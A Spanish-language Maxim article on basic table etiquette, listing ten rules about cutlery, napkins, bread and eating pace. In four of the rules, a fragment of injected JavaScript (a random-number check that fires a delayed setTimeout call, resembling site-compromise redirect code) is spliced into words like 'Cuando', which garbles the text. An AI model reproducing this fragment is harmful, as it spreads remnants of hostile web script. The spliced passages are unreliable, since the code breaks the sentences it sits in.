Normas de etiqueta: saca a relucir tu clase en la mesa

    Normas de etiqueta: saca a relucir tu clase en la mesa

    Lúcete la próxima vez que la invites a cenar.

    Autor: Redacción Maxim 21 noviembre, 2019



    Shutterstock

     

    Reglas básicas de etiqueta en la mesa

     

     

    A todos nos ha pasado. Estamos en una comida y no sabemos dónde colocar un cubierto al terminar un plato o de pronto nos topamos con más de dos tenedores y no sabemos para qué son. 

     

     

    Nosotros estamos aquí para ayudarte a siempre sacar lo mejor de ti. Por eso, creímos buena idea hacer una nota sobre todo lo que hay que tener en cuenta a la hora de sentarnos a la mesa. 

     

    Aquí te van algunas reglas básicas.

     

     

    01. Aunque a lo mejor esta ya es una que sabes, no está de más recordarla. Nunca, pero nunca, se fuma en una mesa. Lo mejor es no hacerlo, pero si haz de fumar, procura que sea al finalizar el postre.

     

    02. Cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando termines de comer, coloca la servilleta del lado izquierdo del plato, nunca encima. 

     

     

    03. Sí, todos lo hacemos, soplarle a la sopa para que se enfríe. Eso déjalo para la privacidad de tu casa, en una reunión, no lo hagas. 

     

    04. Por ningún motivo uses un palillo, cubierto o uña para limpiarte los dientes en la mesa. 

     

     

     

    05. Cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando termines de comer, no retires tu plato ni lo amontones. Coloca tu tenedor y cuchillo en la posición del reloj como si fueran las «cuatro y veinte». 

     

     

     

    06. Empieza por los cubiertos de la parte exterior y ve tomandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando los demás con cada plato que se sirva. El tenedor que está más lejos del plato será el primero que uses.

     

    07. La cuchara y el tenedor del postre las encuentras colocadas en la parte superior del plato.

     

    08. Todos cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando llegamos a la mesa vemos el pan y la mantequilla y empezamos a comer. Si vas a una comida, procura que sean sólo para acompañar la comida principal, nunca deben comerse antes de que lleguen los platillos.

     

    09. El lado izquierdo del plato, el lado de los desechos. Aquí puedes colocar huesos de aceitunas y cosas por el estilo. 

     

    10. Come lentamente, esta actitud te dará estilo y personalidad. 

     

     

     

    Listo, ahora pon estos consejos en práctica. TE DECIMOS CUÁNTO CUESTA COMER EN LOS MEJORES RESTAURANTES DE LA CDMX.

     

     

    Temas relacionados con esta nota: , , ,

Lúcete la próxima vez que la invites a cenar.